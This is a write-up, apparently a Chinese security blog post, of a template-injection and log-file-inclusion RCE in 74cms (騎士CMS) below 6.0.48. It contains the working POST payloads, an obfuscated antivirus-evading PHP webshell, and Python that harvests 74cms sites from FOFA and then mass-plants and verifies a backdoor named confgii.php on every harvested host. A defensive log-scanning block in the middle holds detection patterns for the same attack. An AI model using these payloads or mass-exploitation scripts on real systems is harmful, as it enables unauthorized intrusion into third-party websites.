騎士CMS (74cms) file inclusion + getshell vulnerability reproduction (automated verification and scanning in Python)


Introduction

騎士CMS (74cms) is a free, open-source professional recruitment website system built on PHP + MySQL.

 

Vendor announcement:

http://www.74cms.com/news/show-2497.html

The assign_resume_tpl function in /Application/Common/Controller/BaseController.class.php filters its input insufficiently, which leads to template injection and allows remote command execution.

Affected versions

騎士CMS < 6.0.48

Environment setup

phpStudy is used for the setup here.

Download:

http://www.74cms.com/download/index.html

Start testing:

1. Inject the template into the log file

Send the PoC:
        http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl
        POST:
        variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>

 

Note that I tested on a Windows 10 machine, and the injection gets blocked by antivirus software, so pay attention to AV evasion.

Check the log based on the error message:

        The path is WWW\74cms\upload\data\Runtime\Logs\Home

 
        

2. File inclusion

Send the PoC:
        http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl
        POST:
        variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log   (the log file name is the date)

 

 

At this point a backdoor file is generated in the web root.

 

3. Connect directly with a webshell management tool


Now that the exploitation process is known, the design steps for the automated program follow.

1. Batch-crawl URLs of sites running this framework. The FOFA cookie here has to be replaced for the crawl to succeed; otherwise only the first page can be crawled.

import requests
import base64
from lxml import etree
import time
import sys

# page 1
#https://fofa.so/result?_=1608294544861&page=2&per_page=10&qbase64=ImdsYXNzZmlzaCIgJiYgcG9ydD0iNDg0OCI%3D
def fofa_search(search_data,page):
    #search_data='"glassfish" && port="4848" && country="CN"'
    headers={
        'cookie':'_fofapro_ars_session=53e19ce25439411e6b63466e166b9c27;result_per_page=20',  # remember to replace the cookie
    }
    for yeshu in range(1,page+1):
        url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
        search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
        urls=url+search_data_bs
        try:
            print('正在提取第' + str(yeshu) + '')
            result=requests.get(urls,headers=headers).content
            #print(result.decode('utf-8'))
            soup = etree.HTML(result)
            ip_data=soup.xpath('//div[@class="re-domain"]/a[@target="_blank"]/@href')
            ipdata='\n'.join(ip_data)
            print(ip_data)
            with open(r'ip2.txt','a+') as f:
                f.write(ipdata+'\n')
                f.close()
            time.sleep(5)  # throttle the requests so the site's anti-crawler is not triggered
        except Exception as e:
            print("出錯啦!!!")

if __name__ == '__main__':
    #page=sys.argv[2]
    page=110   # number of pages to crawl
    search='74cms'
    fofa_search(search,int(page))

 

2. Prepare an AV-evading webshell

<?php
class JYWH{
function __destruct(){
$VKMF='PETFhL'^"\x31\x36\x27\x23\x1a\x38";
return @$VKMF("$this->BTMV");
}
}
$jywh=new JYWH();
@$jywh->BTMV=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>

3. Protect the webshell above with base64 encoding

base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+")

4. PHP code that writes the webshell into the site

<?php $myfile = fopen("confgii.php", "w");
fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+"));
fclose($myfile);?>

Running the code above generates a backdoor file.

 

Manual test procedure for this vulnerability

http://127.0.0.1/74cms/upload/?m=home&a=assign_resume_tpl
1.
variable=1&tpl=<?php $myfile = fopen("confgii.php", "w");
fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSllXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XHgyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ21yNiddOz8+"));
fclose($myfile);?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
2.
variable=1&tpl=data/Runtime/Logs/Home/21_01_04.log
3.
http://127.0.0.1/74cms/upload/confgii.php
mr6=phpinfo();

http://127.0.0.1/74cms/upload/confgii.php?id=dd
mr6=cGhwaW5mbygp;
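As an added defender-side example (not part of the original post), the following Python scans web-server access-log lines for the request sequence described above, a POST to the assign_resume_tpl action followed by a fetch of a PHP file that is not a normal entry point, and checks whether a ThinkPHP Runtime log contains PHP or template tags, which is the log poisoning this technique depends on. The sample log lines and the list of legitimate entry points are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format; not taken from any real server.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [04/Jan/2021:10:00:01 +0800] "POST /74cms/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1" 500 1834
203.0.113.5 - - [04/Jan/2021:10:00:02 +0800] "POST /74cms/upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1" 200 512
203.0.113.5 - - [04/Jan/2021:10:00:03 +0800] "GET /74cms/upload/confgii.php HTTP/1.1" 200 0
198.51.100.7 - - [04/Jan/2021:10:01:00 +0800] "GET /74cms/upload/index.php?m=home&a=index HTTP/1.1" 200 9120
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
TPL_ACTION = re.compile(r'[?&]a=assign_resume_tpl\b')
# Assumption: these are the only PHP files a client should ever request directly.
KNOWN_PHP = {'index.php', 'admin.php'}


def scan_access_log(text):
    """Return {client_ip: [findings]} for clients that POST to assign_resume_tpl
    and afterwards fetch a PHP file that is not a known entry point."""
    findings = defaultdict(list)
    posted = set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse
        ip, method, path, status = m.groups()
        if method == 'POST' and TPL_ACTION.search(path):
            posted.add(ip)
            findings[ip].append(f'POST to assign_resume_tpl (status {status})')
        elif ip in posted and path.split('?')[0].endswith('.php'):
            name = path.split('?')[0].rsplit('/', 1)[-1]
            if name not in KNOWN_PHP:
                findings[ip].append(f'possible webshell fetched: {name} (status {status})')
    return dict(findings)


# A ThinkPHP Runtime log should only ever contain plain log text.
PHP_TAG = re.compile(r'<\?php|<\?=|<qscms/', re.IGNORECASE)


def log_file_is_poisoned(log_text):
    """True if PHP or qscms template tags appear in Runtime log content."""
    return bool(PHP_TAG.search(log_text))


if __name__ == '__main__':
    for ip, hits in scan_access_log(SAMPLE_ACCESS_LOG).items():
        print(ip, hits)
```

Run it against the real access log and the files under data/Runtime/Logs/Home to spot both the injection request and the poisoned log the inclusion step needs.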


5. With the preparation done, the following batch-verifies the vulnerability and uploads the backdoor at the same time.

 

import requests
import time
headers={
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    # simulate a browser user: Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    # simulate a search engine: Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
    # more crawler user agents: https://www.cnblogs.com/iack/p/3557371.html
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Sec-Fetch-Dest': 'document',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}

def check_vuln():
    payload_inject= '/?m=home&a=assign_resume_tpl'
    shell= '/confgii.php'
    proxys = {
        'http':'http://127.0.0.1:8080'
    }  # proxy

    data = {
        'variable': '1',
        'tpl': '<?php $myfile = fopen("confgii.php", "w");fwrite($myfile,base64_decode("PD9waHAgY2xhc3MgSl'\
               'lXSHsKICAgIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXsKICAgICAgICAkVktNRj0nUEVURmhMJ14iXHgzMVx4MzZceDI3XH'\
               'gyM1x4MWFceDM4IjsKICAgICAgICByZXR1cm4gQCRWS01GKCIkdGhpcy0+QlRNViIpO319CiRqeXdoPW5ldyBKWVdIKCk7'\
               'CkAkanl3aC0+QlRNVj1pc3NldCgkX0dFVFsnaWQnXSk/YmFzZTY0X2RlY29kZSgkX1BPU1RbJ21yNiddKTokX1BPU1RbJ2'\
               '1yNiddOz8+"));fclose($myfile);?>;ob_flush();?>/r/n<qscms/company_show 列表名="info" />'
    }
    data2 = {
        'variable': '1',
        'tpl': 'data/Runtime/Logs/Home/21_01_04.log'
    }
    i=1
    for ip in open('ip2.txt'):
        ip=ip.replace('\n','')
        inject_url=ip+payload_inject

        try:
            print(str(i)+": checking--------->"+ip)
            vuln_code_w=requests.post(inject_url,data, headers=headers, verify=False, timeout=3).status_code
            # verify=False disables TLS certificate checking
            i = i+1
            print(vuln_code_w)
            time.sleep(0.2)
        except Exception as e:
            print('出錯啦!')
            time.sleep(0.2)
        shell_url=ip+shell

        try:
            vuln_code_2=requests.post(inject_url,data2, headers=headers, verify=False, timeout=3).status_code
            print(vuln_code_2)
            time.sleep(0.2)
        except Exception as e:
            print("出錯啦!")
            time.sleep(0.2)

        try:
            vuln_code=requests.get(shell_url, headers=headers, verify=False, timeout=3).status_code
            print(vuln_code)
            if vuln_code ==200:
                with open(r'vuln.txt','a+') as f:
                    f.write(shell_url+'\n')
                    f.close()
                print('成功上傳shell:'+shell_url)
            else:
                print("不存在該漏洞!")
            time.sleep(0.2)
        except Exception as e:
            print("出錯啦!")
            time.sleep(0.2)


if __name__ == '__main__':
    check_vuln()

 

6. Batch-check whether the backdoors can execute code

import requests
import time
headers={
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    # simulate a browser user: Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    # simulate a search engine: Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
    # more crawler user agents: https://www.cnblogs.com/iack/p/3557371.html
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Sec-Fetch-Dest': 'document',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}

def check_vuln():
    shell= '/confgii.php'
    proxys = {
        'http':'http://127.0.0.1:8080'
    }  # proxy

    data2 = {
        'mr6': 'print("adminokok1");'
    }
    i=1
    for ip in open('vuln.txt'):
        ip=ip.replace('\n','')

        try:
            vuln_code=requests.post(ip, data2, headers=headers, verify=False, timeout=3)
            a=vuln_code.text
            #print(a)

            if a=='adminokok1':
                print(ip+"   :------------->  檢測到已經成功上傳后門!!!")
                with open(r'shell.txt','a+') as f:
                    f.write(ip+'\n')
                    f.close()
            else:
                print(ip+"   :-----> 上傳后門失敗!")
            time.sleep(0.5)
        except Exception as e:
            print("出錯啦!")
            time.sleep(0.2)

if __name__ == '__main__':
    check_vuln()
